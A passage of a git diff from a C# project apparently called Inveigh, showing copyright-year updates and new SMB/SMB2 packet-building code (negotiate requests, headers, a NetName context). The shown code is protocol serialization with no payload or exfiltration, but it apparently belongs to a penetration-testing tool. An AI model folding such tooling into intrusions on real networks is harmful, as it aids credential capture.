-1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketReader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketReader.cs index 904b994..06588af 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketReader.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketReader.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketWriter.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketWriter.cs index d5fa611..4380a40 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketWriter.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketWriter.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMNegotiateRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMNegotiateRequest.cs new file mode 100644 index 0000000..ba6bf36 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMNegotiateRequest.cs @@ -0,0 +1,70 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB +{ + class SMBCOMNegotiateRequest + { + //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cifs/25c8c3c9-58fc-4bb8-aa8f-0272dede84c5 + public byte WordCount { get; set; } + public ushort ByteCount { get; set; } + public byte[] Dialects{ get; set; } + + public SMBCOMNegotiateRequest() + { + this.WordCount = 0; + this.ByteCount = 120; + this.Dialects = new byte[120] { 0x02, 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57, 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00, 0x02, 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e, 0x30, 0x30, 0x32, 0x00, 0x02, 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e, 0x3f, 0x3f, 0x3f, 0x00 }; + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.WordCount); + packetWriter.Write(this.ByteCount); + packetWriter.Write(this.Dialects); + return memoryStream.ToArray(); + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs index 7130014..369414d 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs index 216162e..3162e61 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHeader.cs index 9704220..1e1a6af 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHeader.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHeader.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -87,6 +87,28 @@ namespace Quiddity.SMB } } + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.Protocol); + packetWriter.Write(this.Command); + packetWriter.Write(this.Status); + packetWriter.Write(this.Flags); + packetWriter.Write(this.Flags2); + packetWriter.Write(this.PIDHigh); + packetWriter.Write(this.SecurityFeatures); + packetWriter.Write(this.Reserved); + packetWriter.Write(this.TID); + packetWriter.Write(this.PIDLow); + packetWriter.Write(this.UID); + packetWriter.Write(this.MID); + return memoryStream.ToArray(); + } + + } } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHelper.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHelper.cs index 32f4309..efc9c84 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHelper.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHelper.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -29,6 +29,8 @@ * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ +using Quiddity.NetBIOS; +using Quiddity.Support; using System.IO; namespace Quiddity.SMB @@ -65,6 +67,35 @@ namespace Quiddity.SMB } + public static byte[] GetBytes(object smbCommand) + { + NetBIOSSessionService netBIOSSessionService = new NetBIOSSessionService(); + SMBHeader smbHeader = new SMBHeader(); + return GetBytes(netBIOSSessionService, smbHeader, smbCommand); + } + + public static byte[] GetBytes(NetBIOSSessionService netBIOSSessionService, SMBHeader smbHeader, object smbCommand) + { + byte[] headerData = smbHeader.GetBytes(); + byte[] commandData = new byte[0]; + + switch (smbHeader.Command) + { + + case 0x72: + { + SMBCOMNegotiateRequest command = (SMBCOMNegotiateRequest)smbCommand; + commandData = command.GetBytes(); + } + break; + + } + + netBIOSSessionService.Length = (ushort)(commandData.Length + 32); + byte[] netbiosData = netBIOSSessionService.GetBytes(); + return Utilities.BlockCopy(netbiosData, headerData, commandData); + } + } } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs index bbe6926..cea586e 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs index 3d9b341..7241ada 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs @@ -2,7 +2,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs index 7fd4d42..52c62ff 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs index 02d66a4..27aa414 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs index ead7b7a..f0ffefb 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs index cf48f1e..2cebc5c 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs index 0ab01e9..0f44f5e 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs index b029745..1bd7b3a 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs index e79210a..5a3a584 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs index 884c3af..02c9497 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -54,6 +54,24 @@ namespace Quiddity.SMB2 public byte[] Padding { get; set; } // todo check public byte[] NegotiateContextList { get; set; } + public SMB2NegotiatelRequest() + { + this.StructureSize = 65; + this.DialectCount = 5; + this.SecurityMode = 1; + this.Reserved = new byte[2]; + this.Capabilities = new byte[2]; + this.ClientGUID = new byte[2]; + this.NegotiateContextOffset = 0; + this.NegotiateContextCount = 0; + this.ClientStartTime = BitConverter.GetBytes(DateTime.Now.ToFileTime()); + this.Capabilities = new byte[4]; + this.Dialects = new byte[4]; + this.NegotiateContextOffset = 0; + this.Padding = new byte[2]; // todo check + this.NegotiateContextList = new byte[0]; + } + public SMB2NegotiatelRequest(byte[] data, int offset) { ReadBytes(data, offset); diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs index 43c51b2..b7f7b22 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs index 43534ed..2d06f10 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs index 1cbb484..27fd68e 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs index 4d5f52f..dba7f88 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs index 3259da2..62e8ef2 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs index 7948a9c..cff9796 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs index 48ad1d4..5f1ba50 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs index 64214cc..6cb9fa4 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs index b14ff67..8ff07af 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs index 40e2925..847e22f 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs index daf53e5..48ecc63 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs index 4266118..d7bb47d 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Header.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Header.cs index 65f595e..f62a8cd 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Header.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Header.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Helper.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Helper.cs index 8ef9628..0969c66 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Helper.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Helper.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -109,16 +109,6 @@ namespace Quiddity.SMB2 return Utilities.BlockCopy(netbiosData, headerData, commandData); } - public void NegotiateProtocol() - { - - } - - public void SessionSetup() - { - - } - } } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Packet.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Packet.cs index 945d2f8..cea0137 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Packet.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Packet.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs index 1b94aa6..6639f0e 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -32,6 +32,7 @@ using System; using System.Linq; using System.IO; +using System.Text; namespace Quiddity.SMB2 { @@ -43,6 +44,9 @@ namespace Quiddity.SMB2 public uint Reserved { get; set; } public byte[] Data { get; set; } + // custom + public string NetName { get; set; } + public SMB2NegotiateContext() { this.ContextType = 0; @@ -72,7 +76,7 @@ namespace Quiddity.SMB2 packetWriter.Write(this.DataLength); packetWriter.Write(this.Reserved); packetWriter.Write(this.Data); - packetWriter.Write(new byte[2] { 0x000, 0x00 }); + packetWriter.Write(new byte[2] { 0x00, 0x00 }); } if (contextTypes.Contains("2")) @@ -84,7 +88,7 @@ namespace Quiddity.SMB2 packetWriter.Write(this.DataLength); packetWriter.Write(this.Reserved); packetWriter.Write(this.Data); - packetWriter.Write(new byte[4] { 0x000, 0x00, 0x00, 0x00 }); + packetWriter.Write(new byte[4] { 0x00, 0x00, 0x00, 0x00 }); } if (contextTypes.Contains("3")) @@ -98,6 +102,19 @@ namespace Quiddity.SMB2 packetWriter.Write(this.Data); } + if (contextTypes.Contains("5")) + { + byte[] netName = Encoding.Unicode.GetBytes(this.NetName); + this.ContextType = 5; + this.DataLength = (ushort)netName.Length; + this.Data = new byte[4] { 0x00, 0x00, 0x00, 0x00 }; + packetWriter.Write(this.ContextType); + packetWriter.Write(this.DataLength); + packetWriter.Write(this.Reserved); + packetWriter.Write(this.Data); + packetWriter.Write(netName); + } + return memoryStream.ToArray(); } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs index 8e57949..2674a01 100644 --- 